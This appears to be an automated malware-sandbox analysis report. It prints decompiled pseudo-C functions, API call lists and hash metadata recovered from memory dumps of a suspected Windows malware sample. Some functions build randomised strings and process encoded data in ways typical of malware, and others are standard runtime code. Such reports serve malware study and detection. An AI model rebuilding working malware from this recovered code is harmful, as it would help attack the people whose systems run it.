                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction ID: ddb1edd4f9ed18cc31756fd0c7bb6d8f5c25aa08bd4ac0d45db7d741bc4a5af1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21DD76D54208AFDF02DF95C940EDE7BB9BF08600F0445A9F5099B260EB76DB54CB84
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                                                			E00A85E8A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				long _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				long _t43;
                                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                				void* _t74;
                                                                                                                                                                                                                                				intOrPtr _t75;
                                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr* _t80;
                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t79 =  *0xa8d37c; // 0x1ae9818
                                                                                                                                                                                                                                				_v24 = 8;
                                                                                                                                                                                                                                				_t43 = GetTickCount();
                                                                                                                                                                                                                                				_push(5);
                                                                                                                                                                                                                                				_t74 = 0xa;
                                                                                                                                                                                                                                				_v16 = _t43;
                                                                                                                                                                                                                                				_t44 = E00A89CCC(_t74,  &_v16);
                                                                                                                                                                                                                                				_v8 = _t44;
                                                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                                                					_v8 = 0xa8c1ac;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t46 = E00A81F9B(_t79);
                                                                                                                                                                                                                                				_v12 = _t46;
                                                                                                                                                                                                                                				if(_t46 != 0) {
                                                                                                                                                                                                                                					_t80 = __imp__;
                                                                                                                                                                                                                                					_t48 =  *_t80(_v8, _t71);
                                                                                                                                                                                                                                					_t49 =  *_t80(_v12);
                                                                                                                                                                                                                                					_t50 =  *_t80(_a4);
                                                                                                                                                                                                                                					_t54 = E00A85157(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                                                                                                                					_v20 = _t54;
                                                                                                                                                                                                                                					if(_t54 != 0) {
                                                                                                                                                                                                                                						_t75 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                						_t16 = _t75 + 0xa8eb10; // 0x530025
                                                                                                                                                                                                                                						 *0xa8d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                                                                                                                						_push(4);
                                                                                                                                                                                                                                						_t77 = 5;
                                                                                                                                                                                                                                						_t57 = E00A89CCC(_t77,  &_v16);
                                                                                                                                                                                                                                						_v8 = _t57;
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_v8 = 0xa8c1b0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t58 =  *_t80(_v8);
                                                                                                                                                                                                                                						_t59 =  *_t80(_v12);
                                                                                                                                                                                                                                						_t60 =  *_t80(_a4);
                                                                                                                                                                                                                                						_t91 = E00A85157(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                                                                                                                						if(_t91 == 0) {
                                                                                                                                                                                                                                							E00A853BB(_v20);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t66 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                							_t31 = _t66 + 0xa8ec30; // 0x73006d
                                                                                                                                                                                                                                							 *0xa8d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                                                                                                                							 *_a16 = _v20;
                                                                                                                                                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                							 *_a20 = _t91;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A853BB(_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v24;
                                                                                                                                                                                                                                			}





























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A85E9F
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 00A85EDF
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A85EE8
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A85EEF
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000002), ref: 00A85EFC
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000004), ref: 00A85F5C
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A85F65
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A85F6C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00A85F73
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2535036572-0
                                                                                                                                                                                                                                • Opcode ID: 2e168be769711576e901c1e716e03decddd81cabd31fac891d523b300d3a2605
                                                                                                                                                                                                                                • Instruction ID: 0d62b181c728ce96a094de5041c5d35ed29788d3c601a3ec88b57eef34e05db1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e168be769711576e901c1e716e03decddd81cabd31fac891d523b300d3a2605
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F413472D00219EBCF11AFA4CD09A9EBBB5EF44354F054065EE04AB261DB359A11EFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E736D7B00(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				char _v5;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char _t53;
                                                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                				signed int _t78;
                                                                                                                                                                                                                                				char _t80;
                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                				intOrPtr _t94;
                                                                                                                                                                                                                                				intOrPtr* _t96;
                                                                                                                                                                                                                                				intOrPtr* _t98;
                                                                                                                                                                                                                                				void* _t99;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                				void* _t110;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t87 = __edx;
                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                				_t73 = _a4;
                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                				_v5 = 0;
                                                                                                                                                                                                                                				_v16 = 1;
                                                                                                                                                                                                                                				 *_t73 = E736E0D60(__ecx,  *_t73);
                                                                                                                                                                                                                                				_t74 = _a8;
                                                                                                                                                                                                                                				_t6 = _t74 + 0x10; // 0x11
                                                                                                                                                                                                                                				_t94 = _t6;
                                                                                                                                                                                                                                				_push(_t94);
                                                                                                                                                                                                                                				_v20 = _t94;
                                                                                                                                                                                                                                				_v12 =  *(_t74 + 8) ^  *0x736eb004;
                                                                                                                                                                                                                                				E736D7AC0(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x736eb004);
                                                                                                                                                                                                                                				E736D80A7(_a12);
                                                                                                                                                                                                                                				_t53 = _a4;
                                                                                                                                                                                                                                				_t103 = _t102 + 0x10;
                                                                                                                                                                                                                                				_t91 =  *((intOrPtr*)(_t74 + 0xc));
                                                                                                                                                                                                                                				if(( *(_t53 + 4) & 0x00000066) != 0) {
                                                                                                                                                                                                                                					__eflags = _t91 - 0xfffffffe;
                                                                                                                                                                                                                                					if(_t91 != 0xfffffffe) {
                                                                                                                                                                                                                                						_t87 = 0xfffffffe;
                                                                                                                                                                                                                                						E736D8090(_t74, 0xfffffffe, _t94, 0x736eb004);
                                                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_v32 = _t53;
                                                                                                                                                                                                                                					_v28 = _a12;
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
                                                                                                                                                                                                                                					if(_t91 == 0xfffffffe) {
                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                						return _v16;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							_t78 = _v12;
                                                                                                                                                                                                                                							_t60 = _t91 + (_t91 + 2) * 2;
                                                                                                                                                                                                                                							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
                                                                                                                                                                                                                                							_t61 = _t78 + _t60 * 4;
                                                                                                                                                                                                                                							_t79 =  *((intOrPtr*)(_t61 + 4));
                                                                                                                                                                                                                                							_v24 = _t61;
                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t61 + 4)) == 0) {
                                                                                                                                                                                                                                								_t80 = _v5;
                                                                                                                                                                                                                                								goto L7;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t87 = _t94;
                                                                                                                                                                                                                                								_t62 = E736D8030(_t79, _t94);
                                                                                                                                                                                                                                								_t80 = 1;
                                                                                                                                                                                                                                								_v5 = 1;
                                                                                                                                                                                                                                								_t110 = _t62;
                                                                                                                                                                                                                                								if(_t110 < 0) {
                                                                                                                                                                                                                                									_v16 = 0;
                                                                                                                                                                                                                                									L13:
                                                                                                                                                                                                                                									_push(_t94);
                                                                                                                                                                                                                                									E736D7AC0(_t74, _t87, _t91, _t94, _v12);
                                                                                                                                                                                                                                									goto L14;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									if(_t110 > 0) {
                                                                                                                                                                                                                                										_t63 = _a4;
                                                                                                                                                                                                                                										__eflags =  *_t63 - 0xe06d7363;
                                                                                                                                                                                                                                										if( *_t63 == 0xe06d7363) {
                                                                                                                                                                                                                                											__eflags =  *0x736e115c;
                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                												_t69 = E736E0C00(__eflags, 0x736e115c);
                                                                                                                                                                                                                                												_t103 = _t103 + 4;
                                                                                                                                                                                                                                												__eflags = _t69;
                                                                                                                                                                                                                                												if(_t69 != 0) {
                                                                                                                                                                                                                                													_t98 =  *0x736e115c; // 0x736d7cd5
                                                                                                                                                                                                                                													 *0x736e1104(_a4, 1);
                                                                                                                                                                                                                                													 *_t98();
                                                                                                                                                                                                                                													_t94 = _v20;
                                                                                                                                                                                                                                													_t103 = _t103 + 8;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t63 = _a4;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										_t88 = _t63;
                                                                                                                                                                                                                                										E736D8070(_t63, _a8, _t63);
                                                                                                                                                                                                                                										_t65 = _a8;
                                                                                                                                                                                                                                										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
                                                                                                                                                                                                                                										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
                                                                                                                                                                                                                                											_t88 = _t91;
                                                                                                                                                                                                                                											E736D8090(_t65, _t91, _t94, 0x736eb004);
                                                                                                                                                                                                                                											_t65 = _a8;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
                                                                                                                                                                                                                                										_t66 = E736D7AC0(_t74, _t88, _t91, _t94, _v12);
                                                                                                                                                                                                                                										E736D8050();
                                                                                                                                                                                                                                										asm("int3");
                                                                                                                                                                                                                                										__imp__InterlockedFlushSList(_v40, _t99, _t94);
                                                                                                                                                                                                                                										__eflags = _t66;
                                                                                                                                                                                                                                										if(_t66 != 0) {
                                                                                                                                                                                                                                											_push(_t94);
                                                                                                                                                                                                                                											do {
                                                                                                                                                                                                                                												_t96 =  *_t66;
                                                                                                                                                                                                                                												E736D9721(_t66);
                                                                                                                                                                                                                                												_t66 = _t96;
                                                                                                                                                                                                                                												__eflags = _t96;
                                                                                                                                                                                                                                											} while (_t96 != 0);
                                                                                                                                                                                                                                											return _t66;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										return _t66;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										goto L7;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L28;
                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                							_t91 = _t74;
                                                                                                                                                                                                                                						} while (_t74 != 0xfffffffe);
                                                                                                                                                                                                                                						if(_t80 != 0) {
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L28:
                                                                                                                                                                                                                                			}
































                                                                                                                                                                                                                                0x736d7b87
                                                                                                                                                                                                                                0x736d7b89
                                                                                                                                                                                                                                0x736d7b8c
                                                                                                                                                                                                                                0x736d7b8e
                                                                                                                                                                                                                                0x736d7ba4
                                                                                                                                                                                                                                0x736d7bc4
                                                                                                                                                                                                                                0x736d7bc4
                                                                                                                                                                                                                                0x736d7bc8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7bda
                                                                                                                                                                                                                                0x736d7bdd
                                                                                                                                                                                                                                0x736d7be3
                                                                                                                                                                                                                                0x736d7be5
                                                                                                                                                                                                                                0x736d7bec
                                                                                                                                                                                                                                0x736d7bf3
                                                                                                                                                                                                                                0x736d7bf8
                                                                                                                                                                                                                                0x736d7bfb
                                                                                                                                                                                                                                0x736d7bfd
                                                                                                                                                                                                                                0x736d7bff
                                                                                                                                                                                                                                0x736d7c0c
                                                                                                                                                                                                                                0x736d7c12
                                                                                                                                                                                                                                0x736d7c14
                                                                                                                                                                                                                                0x736d7c17
                                                                                                                                                                                                                                0x736d7c17
                                                                                                                                                                                                                                0x736d7c1a
                                                                                                                                                                                                                                0x736d7c1a
                                                                                                                                                                                                                                0x736d7bec
                                                                                                                                                                                                                                0x736d7c20
                                                                                                                                                                                                                                0x736d7c22
                                                                                                                                                                                                                                0x736d7c27
                                                                                                                                                                                                                                0x736d7c2a
                                                                                                                                                                                                                                0x736d7c2d
                                                                                                                                                                                                                                0x736d7c35
                                                                                                                                                                                                                                0x736d7c39
                                                                                                                                                                                                                                0x736d7c3e
                                                                                                                                                                                                                                0x736d7c3e
                                                                                                                                                                                                                                0x736d7c45
                                                                                                                                                                                                                                0x736d7c48
                                                                                                                                                                                                                                0x736d7c58
                                                                                                                                                                                                                                0x736d7c5d
                                                                                                                                                                                                                                0x736d7c64
                                                                                                                                                                                                                                0x736d7c6a
                                                                                                                                                                                                                                0x736d7c6c
                                                                                                                                                                                                                                0x736d7c6e
                                                                                                                                                                                                                                0x736d7c6f
                                                                                                                                                                                                                                0x736d7c6f
                                                                                                                                                                                                                                0x736d7c72
                                                                                                                                                                                                                                0x736d7c77
                                                                                                                                                                                                                                0x736d7c7a
                                                                                                                                                                                                                                0x736d7c7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7c7e
                                                                                                                                                                                                                                0x736d7c80
                                                                                                                                                                                                                                0x736d7b92
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b92
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7b8e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b97
                                                                                                                                                                                                                                0x736d7b97
                                                                                                                                                                                                                                0x736d7b99
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x736d7b65
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7B37
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 736D7B3F
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7BC8
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 736D7BF3
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7C48
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                • Opcode ID: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction ID: 06bcfdb3823eca6632ae82424dedac963ae3f8a898a7b5a53310191a76ef24ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1741A234A10218AFCF00DF69C984B9EBFB5FF45324F148595E81A9B3D1D731AA05CB96
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DB9A8(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				signed int* _v8;
                                                                                                                                                                                                                                				void** _t12;
                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                				WCHAR* _t23;
                                                                                                                                                                                                                                				void** _t26;
                                                                                                                                                                                                                                				signed int* _t29;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t29 = _a4;
                                                                                                                                                                                                                                				while(_t29 != _a8) {
                                                                                                                                                                                                                                					_t22 =  *_t29;
                                                                                                                                                                                                                                					_t12 = 0x736efa08 + _t22 * 4;
                                                                                                                                                                                                                                					_t32 =  *_t12;
                                                                                                                                                                                                                                					_v8 = _t12;
                                                                                                                                                                                                                                					if(_t32 == 0) {
                                                                                                                                                                                                                                						_t23 =  *(0x736e1f08 + _t22 * 4);
                                                                                                                                                                                                                                						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                                                                                                                                                                                                						if(_t32 != 0) {
                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                							_t26 = _v8;
                                                                                                                                                                                                                                							 *_t26 = _t32;
                                                                                                                                                                                                                                							if( *_t26 != 0) {
                                                                                                                                                                                                                                								FreeLibrary(_t32);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                                                                                								_t16 = _t32;
                                                                                                                                                                                                                                								L18:
                                                                                                                                                                                                                                								return _t16;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                                							_t29 =  &(_t29[1]);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = GetLastError();
                                                                                                                                                                                                                                						if(_t18 != 0x57) {
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							_t32 = 0;
                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *_v8 = _t18 | 0xffffffff;
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = E736D9913(_t23, L"api-ms-", 7);
                                                                                                                                                                                                                                						_t34 = _t34 + 0xc;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = E736D9913(_t23, L"ext-ms-", 7);
                                                                                                                                                                                                                                						_t34 = _t34 + 0xc;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                                                                                                                                                                                                						_t32 = _t18;
                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t32 == 0xffffffff) {
                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 0-537541572
                                                                                                                                                                                                                                • Opcode ID: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction ID: bd3f09eb500b2476a93856ba6a92cdf78bda29b44807552fa0e939510c4026fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7210B72A51214FBDF129665CD44B5A3BADEB01760F1C0251ED1BAB2C9EBB0DD04C6E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                			E00A822AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                                				char* _t28;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				char* _t36;
                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                				char* _t41;
                                                                                                                                                                                                                                				char* _t42;
                                                                                                                                                                                                                                				char* _t43;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t34 = __edx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t9 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t1 = _t9 + 0xa8e62c; // 0x253d7325
                                                                                                                                                                                                                                				_t36 = 0;
                                                                                                                                                                                                                                				_t28 = E00A81BB5(__ecx, _t1);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					_t40 = __imp__;
                                                                                                                                                                                                                                					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                					_v8 = _t13;
                                                                                                                                                                                                                                					_t41 = E00A85157(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                						strcpy(_t41, _t28);
                                                                                                                                                                                                                                						_pop(_t33);
                                                                                                                                                                                                                                						__imp__(_t41, _a4);
                                                                                                                                                                                                                                						_t36 = E00A873E0(_t34, _t41, _a8);
                                                                                                                                                                                                                                						E00A853BB(_t41);
                                                                                                                                                                                                                                						_t42 = E00A815FD(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                						if(_t42 != 0) {
                                                                                                                                                                                                                                							E00A853BB(_t36);
                                                                                                                                                                                                                                							_t36 = _t42;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t43 = E00A8698B(_t36, _t33);
                                                                                                                                                                                                                                						if(_t43 != 0) {
                                                                                                                                                                                                                                							E00A853BB(_t36);
                                                                                                                                                                                                                                							_t36 = _t43;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A853BB(_t28);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t36;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A81BB5: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,00A822C5,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?), ref: 00A81C1C
                                                                                                                                                                                                                                  • Part of subcall function 00A81BB5: sprintf.NTDLL ref: 00A81C3D
